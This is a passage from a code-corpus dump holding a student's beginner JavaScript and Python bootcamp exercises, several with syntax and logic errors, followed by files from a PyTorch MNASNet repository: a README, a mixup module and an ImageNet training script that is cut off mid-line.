"text": "\"use strict\";\n\nvar kids = [\n{name: \"beluka\", candies: 3},\n{name: \"katika\", candies: 15},\n{name: \"sanyika\", candies: 30},\n{name: \"petike\", candies: 0},\n{name: \"cicuka\", candies: 8}\n];\n\nfunction getRichestKidName(kids) {\n var richestkid = kids[0];\n for (var i = 1; i < kids.length; i++) {\n if ( richestkid.candies < kids[i].candies) {\n richestkid = kids[i];\n }\n }\n return richestkid.name;\n }\nconsole.log(getRichestKidName(kids));\n"
},
{
"alpha_fraction": 0.6639004349708557,
"alphanum_fraction": 0.6639004349708557,
"avg_line_length": 17.538461685180664,
"blob_id": "0c784e0cf66ca340e7aaf2a7205a27e59019cb06",
"content_id": "49da4064ed80655e6b48c608fa56cc114891bab9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 241,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 13,
"path": "/week-8/tuesday/function.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar button = document.querySelector(\"button\")\n\nbutton.addEventListener(\"click\", shout());\n\nfunction shout() {\n console.log(\"agsd\");\n console.log(\"agsd\");\n console.log(\"agsd\");\n console.log(\"agsd\");\n console.log(\"agsd\");\n}\n"
},
{
"alpha_fraction": 0.43323442339897156,
"alphanum_fraction": 0.4925816059112549,
"avg_line_length": 13.65217399597168,
"blob_id": "321b757bdd830446c69253e2b97b79b554e97aa1",
"content_id": "2212d5baac020472301a3de32bd02ed37a975348",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 337,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 23,
"path": "/week-7/tuesday/min.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar number = [7, 8, 4, -1, 13, 55];\nvar a = number[0];\n\nfor (var i = 1; i < number.length; i++) {\n if (number[i] < a) {\n a = number[i];\n }\n}\n\nconsole.log(a);\n\n\n\nvar number = [7, 8, 4, -1, 13, 55];\nvar a = number[0];\n\nfor (var i = 1; i < number.length; i++) {\n a = (number[i] < a ? number[i] : a);\n}\n\nconsole.log(a);\n"
},
{
"alpha_fraction": 0.4084506928920746,
"alphanum_fraction": 0.5070422291755676,
"avg_line_length": 10.833333015441895,
"blob_id": "e9a6dc0792a97acbcbd3c8f4024de55519a6f325",
"content_id": "077ec7ed3e9ee9742d5a88cb35f9469a34e33cc0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 71,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 6,
"path": "/week-3/Monday/for.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "numbers = [15, 3, 26, 4]\ns = 0\n\nfor n in numbers:\n s += n\nprint (s)\n"
},
{
"alpha_fraction": 0.3507462739944458,
"alphanum_fraction": 0.41044774651527405,
"avg_line_length": 10.166666984558105,
"blob_id": "455fdfe62c400e56b2ee1605dfbdd4fbc9aa3cc3",
"content_id": "9853947e352967cfe41b00ad3fedefbef66665de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 12,
"path": "/week-4/practice/27.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "ab = [3, 4, 5, 6, 7]\ni = 0\n\nwhile i < len(ab):\n ab[i] *= 2\n i += 1\n\nprint(ab)\n\n----\nfor i in range(len(ab)):\n ab[i] *= ab[i]\n"
},
{
"alpha_fraction": 0.5318351984024048,
"alphanum_fraction": 0.5468164682388306,
"avg_line_length": 16.799999237060547,
"blob_id": "aa8cc71eed2de6d6f6e3050075999f4dd6ddf2b9",
"content_id": "7eb842b5102dd6259ad71764c9afc7946999e522",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 267,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 15,
"path": "/week-7/practice/range3.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfunction range(from, to, steps) {\n var output = [];\n if (steps > 0) {\n for (var i = from; i < to; i+=steps){\n output.push(i);\n }\n} else { for(var i = from; i > to; i+=steps){\n output.push(i);\n}\n return output;\n}\n\nconsole.log(range(8, 4, -1));\n"
},
{
"alpha_fraction": 0.5618221163749695,
"alphanum_fraction": 0.6182212829589844,
"avg_line_length": 20.952381134033203,
"blob_id": "7f8f7c2faa0a74f72cdbeee5ce6409d8492b5cd5",
"content_id": "ba74cc3a11c60a8f7ad854fae7443c49b7d93d00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 461,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 21,
"path": "/week-5/monday/rpg/cerlic_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom cerlic import Cerlic\n\nclass TestCerlic(unittest.TestCase):\n def test_existance(self):\n cerlic = Cerlic(\"Test\", 100, 10)\n\n def test_inheritance(self):\n cerlic = Cerlic(\"Test\", 100, 10)\n self.assertEqual(cerlic. hp, 100)\n\n def test_healing(self):\n cerlic = Cerlic(\"Test\", 100, 10)\n ally = Cerlic(\"Ally\", 100, 10)\n cerlic.heal(ally)\n self.assertEqual(ally.hp, 110)\n\n\n\n\nunittest.main()\n"
},
{
"alpha_fraction": 0.6815286874771118,
"alphanum_fraction": 0.6815286874771118,
"avg_line_length": 9.466666221618652,
"blob_id": "1ce7d59024a997853388a679e1d2f4ede08808fe",
"content_id": "01e577eb838f6354698bd5c86b8042ee185c92a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 15,
"path": "/week-6/project/menu_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom menu import MainMenu\n\n\nclass TestMenu(unittest.TestCase):\n def test_if_exist(self):\n menu = MainMenu()\n\n\n\n\n\n\n\nunittest.main()\n"
},
{
"alpha_fraction": 0.5103448033332825,
"alphanum_fraction": 0.5241379141807556,
"avg_line_length": 8.0625,
"blob_id": "84fb0219128c4db08be63b4c03f3e996b9345065",
"content_id": "0c2a4b61440092d1f38ce2b8622bebe8cf92d6cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 148,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 16,
"path": "/week-3/tuesday/def.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "def add(a, b):\n return a +b\nnum = add(3,4)\n print(num)\n\n\n\n\nname = \"\"\n\ndef greet():\n print(\"csáá\" + name)\n\n\ngreet(\"Dorka\")\ngreet(\"Béla\")\n"
},
{
"alpha_fraction": 0.5456674695014954,
"alphanum_fraction": 0.5526931881904602,
"avg_line_length": 18.409090042114258,
"blob_id": "cb35d0e4a2513d1c3133a158680d541c44f7c808",
"content_id": "c54309be5d7834886de0936e8a8f173e3d87e61b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 427,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 22,
"path": "/week-5/tuesday/node.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Node:\n def __init__(self, value, left = Node, right = Node):\n self.value = value\n self.left = left\n self.right = right\n\nroot = Node(\n 1,\n Node(2) #left\n Node(3) #right\n)\n\nclass LeftIterator:\n def __init__(self, root):\n self.curr = root\n\n def next(self):\n self.curr = self.curr.left\n return self.curr is not None\n\n def current(self):\n return self.curr\n"
},
{
"alpha_fraction": 0.57485032081604,
"alphanum_fraction": 0.6227545142173767,
"avg_line_length": 12.916666984558105,
"blob_id": "76f8b7796ad47036663c6efd85f6324da8ce4c7a",
"content_id": "4c5efb9f022eff77543837fd4caedef0c9843ce8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 12,
"path": "/week-8/tuesday/workshop/intervall.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar count = 0;\n\nsetInterval(function() {\n count++;\n console.log(\"Yeyeee \" + count)\n}, 500);\n\nsetTimeout(function() {\n console.log(\"Bibiii\")\n}, 5000);\n"
},
{
"alpha_fraction": 0.6937798857688904,
"alphanum_fraction": 0.6937798857688904,
"avg_line_length": 22.22222137451172,
"blob_id": "0abb60f3d0ce521c5c6ef44d9903a5ea68409167",
"content_id": "35e3bea4f55c443dabe2acc9fd749862afdf4fdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 9,
"path": "/week-4/practice/41.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "filename = \"alma.txt\"\n\ndef print_content(filename):\n file_to_print = open(filename)\n file_content = file_to_print.read()\n file_to_print.close()\n return file_content\n\nprint(print_content(filename))\n"
},
{
"alpha_fraction": 0.6633166074752808,
"alphanum_fraction": 0.6783919334411621,
"avg_line_length": 17.090909957885742,
"blob_id": "4769e5d1dc78f79540e61472eee43b9ba885acba",
"content_id": "d390743e4b48b6e58b4986b38f348613a1ca52d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 199,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 11,
"path": "/week-4/tuesday/test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "from reverse import reverse_list\n\nimport os\n\nprint(reverse_list([1, 2, 3]))\nprint(os.getcwd())\n\nalma_file = open( \"alma.txt\", \"w\")\nprint(alma_file.read())\nalma_file.write( \"eper\" )\nalma_file.close()\n"
},
{
"alpha_fraction": 0.6346516013145447,
"alphanum_fraction": 0.6440678238868713,
"avg_line_length": 26.947368621826172,
"blob_id": "25bb68dcc0ebd59c82467d1c5c05d0bad6776c65",
"content_id": "29bf7d30845c41999bfc27285f05d7b13ffc79e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 531,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 19,
"path": "/week-5/monday/countletters/countletters_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom countletters import count_letters\n\nclass LettersCounterTest(unittest.TestCase):\n def test_if_exist(self):\n self.assertEqual(count_letters(\"\"), {})\n\n def test_same_letter(self):\n self.assertEqual(count_letters(\"a\"), {\"a\":1})\n self.assertEqual(count_letters(\"aa\"), {\"a\":2})\n\n def test_different_letters(self):\n self.assertEqual(count_letters(\"b\"), {\"b\":1})\n\n def test_distinct_letters(self):\n self.assertEqual(count_letters(\"ab\"), {\"a\":1, \"b\":1})\n\n\nunittest.main()\n"
},
{
"alpha_fraction": 0.45886075496673584,
"alphanum_fraction": 0.45886075496673584,
"avg_line_length": 25.33333396911621,
"blob_id": "ce1822f769ee2c616e90e053d2bc0e79315c3e44",
"content_id": "8b2614706bde42457517f609a4cc7247819d5ac4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 316,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 12,
"path": "/week-3/wednesday/space.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class SuperString(object):\n def __init__(self, my_string):\n self.string = my_string\n\n def my_space(self)\n my_space = \"\"\n for i in self.string:\n if i == \" \":\n my_space = my_space \"_\"\n else:\n my_space = my_space +i\n return my_space\n"
},
{
"alpha_fraction": 0.5108225345611572,
"alphanum_fraction": 0.536796510219574,
"avg_line_length": 15.5,
"blob_id": "5c11b053132a0a6d7939111fc2834c911ed06934",
"content_id": "dc5308e9ad89b1381f9f0c974ccd89ba04f9c9c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 231,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 14,
"path": "/week-3/wednesday/python.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "def get_fizz(number):\n if number % 3 == 0:\n return\"fizz\"\n else:\n return number\n\n\ndef fizzbuzz(minimum, maximum):\n n = minimum\n while n <= maximum:\n print(get_fizz(n))\n n +=1\n\nfizzbuzz(0, 50)\n"
},
{
"alpha_fraction": 0.6399999856948853,
"alphanum_fraction": 0.6399999856948853,
"avg_line_length": 24,
"blob_id": "62dd4acab8447153529f10172caf9e2098735318",
"content_id": "228275f167d0d5074b1e296125982d203767c086",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 9,
"path": "/week-4/practice/line_char_count.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "def wc(filename):\n input_file = open(\"alma.txt\")\n file_content = input_file.read()\n line_count = len(file_content.split( \"\\n\"))\n input_file.close()\n return [line_count, len(file_content)]\n\n\nprint(wc(filename))\n"
},
{
"alpha_fraction": 0.6545454263687134,
"alphanum_fraction": 0.6545454263687134,
"avg_line_length": 19,
"blob_id": "aacc2bf85276657f779832c95e7ba29b1c90eb0f",
"content_id": "99432bd5fdc0a9eefe232039438c4fb3f0f45dcf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 11,
"path": "/week-8/thursday/callback7.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar fs = require(\"fs\");\n\nvar out = \"\";\n\nfs.readFile(\"apple.txt\", function(error, almaContent) {\n fs.readFile(\"pear.txt\", function(error, pearContent) {\n console.log(almaContent + pearContent);\n })\n})\n"
},
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 10,
"blob_id": "8af8477469d5d9f5489e94675de92d3b0e1452fe",
"content_id": "098b95a3d96f4fa8e55c3ceb070244c83caf50d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 3,
"path": "/week-7/wednesday/script.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nalert(\"Helloka\");\n"
},
{
"alpha_fraction": 0.4893617033958435,
"alphanum_fraction": 0.5265957713127136,
"avg_line_length": 17.799999237060547,
"blob_id": "0092d1513f3eb8e24f1d0713d1ee3f7021dd70f1",
"content_id": "4ed69663338e484a22f5f2ea95a148908074ae9a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 188,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 10,
"path": "/week-4/practice/36.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "numbers = [3, 4, 5, 6, 7]\n\ndef filter_odd(my_list):\n output = []\n for i in my_list:\n if i % 2 == 0:\n output.append(i)\n return output\n\nprint(filter_odd(numbers))\n"
},
{
"alpha_fraction": 0.45724907517433167,
"alphanum_fraction": 0.4795539081096649,
"avg_line_length": 13.94444465637207,
"blob_id": "7c0575a21e6ed3ae66703af613dfb7b2ce05823c",
"content_id": "1730f8d2682adcbd3b0549087d393d3da48e6fb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 18,
"path": "/week-3/tuesday/greetl.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "#def greet(name, hi = \"Hello\"):\n# print(hi + \", \" + name)\n#\n#greet(\"Dorka\" , \"hello\")\n#greet(\"Dorka\" , \"hy\")\n\n\ndef add(a, b, res = None):\n if res is None:\n res = []\n r = a + b\n res.append(r)\n print(res)\n return r\n\nadd(1, 2)\nadd(3, 4)\nadd(5, 6)\n"
},
{
"alpha_fraction": 0.5350318551063538,
"alphanum_fraction": 0.5605095624923706,
"avg_line_length": 11.5600004196167,
"blob_id": "ce9a115f995216a5b74f5afad18c75dfa2bd6d90",
"content_id": "ea85342cbdb00140836b27177ab697cc2f5d73a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 315,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 25,
"path": "/week-7/tuesday/for.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfor (var i = 1; i < 11 ; i++) {\n console.log(i)\n}\n\n\n\nvar dogs = [\"berni\", \"tacskó\", \"pincs\"]\n\nfor (var i = 0; i < dogs.length; i++) {\n console.log(dogs[i])\n}\n\n\n//csak objektumra!\nvar student = {\n kor: 12,\n name:\"csaba\",\n labmeret: 45\n};\n\nfor (var key in student) {\nconsole.log(student[key]);\n}\n"
},
{
"alpha_fraction": 0.5650224089622498,
"alphanum_fraction": 0.591928243637085,
"avg_line_length": 21.299999237060547,
"blob_id": "8e03a1b5f9bda96b952248dc32903a909775a0ab",
"content_id": "6af94db06941f693e5634914982852efe11c8589",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 223,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 10,
"path": "/week-4/practice/37.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "numbers = [7, 5, 8, -1, 2]\n\ndef minimal_element(my_list):\n min_number = my_list[0]\n for num in my_list:\n if min_number > num:\n min_number = num\n return min_number\n\nprint(minimal_element(numbers))\n"
}
] | 72 |
snakers4/MNASNet-pytorch-1
|
https://github.com/snakers4/MNASNet-pytorch-1
|
551f383e3a01cd07695612e6157598d51e1afc2f
|
225f4872091ed0752df3a95aad54b5ec5dedff02
|
66dba7e5f0ed442f8bfd172372de2ee0e88edf36
|
refs/heads/master
| 2020-04-30T01:09:44.533204 | 2019-03-18T17:45:20 | 2019-03-18T17:45:20 | 176,521,806 | 2 | 0 | null | 2019-03-19T13:48:17 | 2019-03-19T13:40:56 | 2019-03-18T17:45:26 | null |
[
{
"alpha_fraction": 0.6728922128677368,
"alphanum_fraction": 0.7022411823272705,
"avg_line_length": 40.66666793823242,
"blob_id": "9fc949f19820f236b1271191a90457af0ff16e08",
"content_id": "da6302bce78e2d4614bbad3c8ac6f839ceaba8d3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1874,
"license_type": "permissive",
"max_line_length": 172,
"num_lines": 45,
"path": "/README.md",
"repo_name": "snakers4/MNASNet-pytorch-1",
"src_encoding": "UTF-8",
"text": "# MNASNet in PyTorch\n\nAn implementation of `MNASNet` in PyTorch. `MNASNet` is an efficient\nconvolutional neural network architecture for mobile devices,\ndeveloped with architectural search. For more information check the paper:\n[MnasNet: Platform-Aware Neural Architecture Search for Mobile](https://arxiv.org/abs/1807.11626)\n\nThe model is is implemented by\n[billhhh](https://github.com/billhhh/MnasNet-pytorch-pretrained)\nand the initial idea of reproducing MNASNet is by\n[snakers4](https://github.com/snakers4/mnasnet-pytorch)\n\n## Usage\n\nClone the repo:\n```bash\ngit clone https://github.com/Randl/MNASNet-pytorch\npip install -r requirements.txt\n```\n\nUse the model defined in `model.py` to run ImageNet example:\n```bash\npython3 -m torch.distributed.launch --nproc_per_node=8 imagenet.py --dataroot \"/path/to/imagenet/\" --warmup 5 --sched cosine -lr 0.2 -b 128 -d 5e-5 --world-size 8 --seed 42\n```\n\nTo continue training from checkpoint\n```bash\npython imagenet.py --dataroot \"/path/to/imagenet/\" --resume \"/path/to/checkpoint/folder\"\n```\n## Results\nInitially I've got 72+% top-1 accuracy, but the checkpointing didn't\nwork properly. I believe the results are reproducable.\n\n|Classification Checkpoint| MACs (M) | Parameters (M)| Top-1 Accuracy| Top-5 Accuracy| Claimed top-1| Claimed top-5|\n|-------------------------|------------|---------------|---------------|---------------|---------------|---------------|\n\nYou can test it with\n```bash\npython imagenet.py --dataroot \"/path/to/imagenet/\" --resume \"results/shufflenet_v2_0.5/model_best.pth.tar\" -e\n```\n\n## Other implementations\n\n- [Mnasnet.MXNet](https://github.com/chinakook/Mnasnet.MXNet) -- A Gluon implementation of Mnasnet, 73.6% top-1 and 91.52% top-5\n- [MnasNet-pytorch-pretrained](https://github.com/billhhh/MnasNet-pytorch-pretrained) -- A PyTorch implementation of Mnasnet, 70.132% top-1 and 89.434% top-5"
},
{
"alpha_fraction": 0.5986394286155701,
"alphanum_fraction": 0.6190476417541504,
"avg_line_length": 34.482757568359375,
"blob_id": "405e0201199a312c1ceb2a61eea08a3f36c92460",
"content_id": "5af9387045babdf9965d0edeb59adb1940dca7fa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1029,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 29,
"path": "/mixup.py",
"repo_name": "snakers4/MNASNet-pytorch-1",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch.distributions import Beta\n\nfrom utils.cross_entropy import onehot\n\n\ndef mixup(x, y, num_classes, gamma, smooth_eps):\n if gamma == 0 and smooth_eps == 0:\n return x, y\n m = Beta(torch.tensor([gamma]), torch.tensor([gamma]))\n lambdas = m.sample([x.size(0), 1, 1]).to(x)\n my = onehot(y, num_classes).to(x)\n true_class, false_class = 1. - smooth_eps * num_classes / (num_classes - 1), smooth_eps / (num_classes - 1)\n my = my * true_class + torch.ones_like(my) * false_class\n perm = torch.randperm(x.size(0))\n x2 = x[perm]\n y2 = my[perm]\n return x * (1 - lambdas) + x2 * lambdas, my * (1 - lambdas) + y2 * lambdas\n\n\nclass Mixup(torch.nn.Module):\n def __init__(self, num_classes=1000, gamma=0, smooth_eps=0):\n super(Mixup, self).__init__()\n self.num_classes = num_classes\n self.gamma = gamma\n self.smooth_eps = smooth_eps\n\n def forward(self, input, target):\n return mixup(input, target, self.num_classes, self.gamma, self.smooth_eps)\n"
},
{
"alpha_fraction": 0.6131446361541748,
"alphanum_fraction": 0.6297455430030823,
"avg_line_length": 50.21254348754883,
"blob_id": "1cb777cf6df4b5644d6e12fda075d37de0711bde",
"content_id": "4de672eff0a7ffc97a726cc88fd6bcaa42d81ad3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14698,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 287,
"path": "/imagenet.py",
"repo_name": "snakers4/MNASNet-pytorch-1",
"src_encoding": "UTF-8",
"text": "import argparse\nimport csv\nimport os\nimport random\nimport sys\nfrom datetime import datetime\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.distributed as dist\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\nfrom torch.optim.lr_scheduler import MultiStepLR, StepLR\nfrom tqdm import trange\n\nimport flops_benchmark\nfrom MnasNet import MnasNet\nfrom clr import CyclicLR\nfrom cosine_with_warmup import CosineLR\nfrom data import get_loaders\nfrom mixup import Mixup\nfrom utils.cross_entropy import CrossEntropyLoss\nfrom utils.logger import CsvLogger\nfrom utils.optimizer_wrapper import OptimizerWrapper\nfrom run import train, test, save_checkpoint, find_bounds_clr\n\n# https://arxiv.org/abs/1807.11626\n# input_size, scale\nclaimed_acc_top1 = {224: {0.35: 0.624, 0.5: 0.678, 0.75: 0.715, 1.: 0.74, 1.3: 0.755, 1.4: 0.759}, 192: {1: 0.724},\n 160: {1: 0.707}, 128: {1: 0.673}, 96: {1: 0.623}}\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='MNASNet training with PyTorch')\n parser.add_argument('--dataroot', required=True, metavar='PATH',\n help='Path to ImageNet train and val folders, preprocessed as described in '\n 'https://github.com/facebook/fb.resnet.torch/blob/master/INSTALL.md#download-the-imagenet-dataset')\n parser.add_argument('--device', default='cuda', help='device assignment (\"cpu\" or \"cuda\")')\n parser.add_argument('-j', '--workers', default=6, type=int, metavar='N',\n help='Number of data loading workers (default: 6)')\n parser.add_argument('--type', default='float32', help='Type of tensor: float32, float16, float64. Default: float32')\n\n # distributed\n parser.add_argument('--world-size', default=-1, type=int, help='number of distributed processes')\n parser.add_argument('--local_rank', default=-1, type=int, help='rank of distributed processes')\n parser.add_argument('--dist-init', default='env://', type=str, help='init used to set up distributed training')\n parser.add_argument('--dist-backend', default='nccl', type=str, help='distributed backend')\n\n # Optimization options\n parser.add_argument('--sched', dest='sched', type=str, default='multistep')\n parser.add_argument('--epochs', type=int, default=400, help='Number of epochs to train.')\n parser.add_argument('-b', '--batch-size', default=64, type=int, metavar='N', help='mini-batch size (default: 64)')\n parser.add_argument('--learning_rate', '-lr', type=float, default=0.1, help='The learning rate.')\n parser.add_argument('--momentum', '-m', type=float, default=0.9, help='Momentum.')\n parser.add_argument('--decay', '-d', type=float, default=1e-4, help='Weight decay (L2 penalty).')\n parser.add_argument('--gamma', type=float, default=0.1, help='LR is multiplied by gamma at scheduled epochs.')\n parser.add_argument('--schedule', type=int, nargs='+', default=[200, 300],\n help='Decrease learning rate at these epochs.')\n parser.add_argument('--step', type=int, default=40, help='Decrease learning rate each time.')\n parser.add_argument('--warmup', default=0, type=int, metavar='N', help='Warmup length')\n parser.add_argument('--mixup', type=float, default=0.2, help='Mixup gamma value.')\n parser.add_argument('--smooth-eps', type=float, default=0.1, help='Label smoothing epsilon value.')\n parser.add_argument('--num-classes', type=int, default=1000, help='Number of classes.')\n\n # CLR\n parser.add_argument('--min-lr', type=float, default=1e-5, help='Minimal LR for CLR.')\n parser.add_argument('--max-lr', type=float, default=1, help='Maximal LR for CLR.')\n parser.add_argument('--epochs-per-step', type=int, default=20,\n help='Number of epochs per step in CLR, recommended to be between 2 and 10.')\n parser.add_argument('--mode', default='triangular2', help='CLR mode. One of {triangular, triangular2, exp_range}')\n parser.add_argument('--find-clr', dest='find_clr', action='store_true',\n help='Run search for optimal LR in range (min_lr, max_lr)')\n\n # Checkpoints\n parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true', help='Just evaluate model')\n parser.add_argument('--save', '-s', type=str, default='', help='Folder to save checkpoints.')\n parser.add_argument('--results_dir', metavar='RESULTS_DIR', default='./results', help='Directory to store results')\n parser.add_argument('--resume', default='', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\n parser.add_argument('--start-epoch', default=0, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\n parser.add_argument('--log-interval', type=int, default=100, metavar='N',\n help='Number of batches between log messages')\n parser.add_argument('--seed', type=int, default=None, metavar='S', help='random seed (default: random)')\n\n # Architecture\n parser.add_argument('--scaling', type=float, default=1, metavar='SC', help='Scaling of MNASNet (default x1).')\n parser.add_argument('--dp', type=float, default=0.1, metavar='DP', help='Dropping probability of DropBlock')\n parser.add_argument('--input-size', type=int, default=224, metavar='I', help='Input size of MNASNet.')\n\n args = parser.parse_args()\n\n args.distributed = args.local_rank >= 0 or args.world_size > 1\n args.child = args.distributed and args.local_rank > 0\n if not args.distributed:\n args.local_rank = 0\n args.world_size = 1\n if args.seed is None:\n args.seed = random.randint(1, 10000)\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n\n time_stamp = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n if args.evaluate:\n args.results_dir = '/tmp'\n if args.save is '':\n args.save = time_stamp\n args.save_path = os.path.join(args.results_dir, args.save)\n if not os.path.exists(args.save_path) and not args.child:\n os.makedirs(args.save_path)\n\n if args.device == 'cuda' and torch.cuda.is_available():\n cudnn.enabled = True\n cudnn.benchmark = True\n args.gpus = [args.local_rank]\n args.device = 'cuda:' + str(args.gpus[0])\n torch.cuda.set_device(args.gpus[0])\n torch.cuda.manual_seed(args.seed)\n else:\n args.gpus = []\n args.device = 'cpu'\n\n if args.type == 'float64':\n args.dtype = torch.float64\n elif args.type == 'float32':\n args.dtype = torch.float32\n elif args.type == 'float16':\n args.dtype = torch.float16\n else:\n raise ValueError('Wrong type!') # TODO int8\n\n if not args.child:\n print(\"Random Seed: \", args.seed)\n print(args)\n return args\n\n\ndef is_bn(module):\n return isinstance(module, torch.nn.BatchNorm1d) or \\\n isinstance(module, torch.nn.BatchNorm2d) or \\\n isinstance(module, torch.nn.BatchNorm3d)\n\ndef main():\n args = get_args()\n device, dtype = args.device, args.dtype\n\n train_loader, val_loader = get_loaders(args.dataroot, args.batch_size, args.batch_size, args.input_size,\n args.workers, args.world_size, args.local_rank)\n\n model = MnasNet(n_class=args.num_classes, width_mult=args.scaling, drop_prob=0.0,\n num_steps=len(train_loader) * args.epochs)\n num_parameters = sum([l.nelement() for l in model.parameters()])\n flops = flops_benchmark.count_flops(MnasNet, 1, device,\n dtype, args.input_size, 3, width_mult=args.scaling)\n if not args.child:\n print(model)\n print('number of parameters: {}'.format(num_parameters))\n print('FLOPs: {}'.format(flops))\n\n # define loss function (criterion) and optimizer\n criterion = CrossEntropyLoss()\n mixup = Mixup(args.num_classes, args.mixup, args.smooth_eps)\n\n model, criterion = model.to(device=device, dtype=dtype), criterion.to(device=device, dtype=dtype)\n if args.dtype == torch.float16:\n for module in model.modules(): # FP batchnorm\n if is_bn(module):\n module.to(dtype=torch.float32)\n\n if args.distributed:\n args.device_ids = [args.local_rank]\n dist.init_process_group(backend=args.dist_backend, 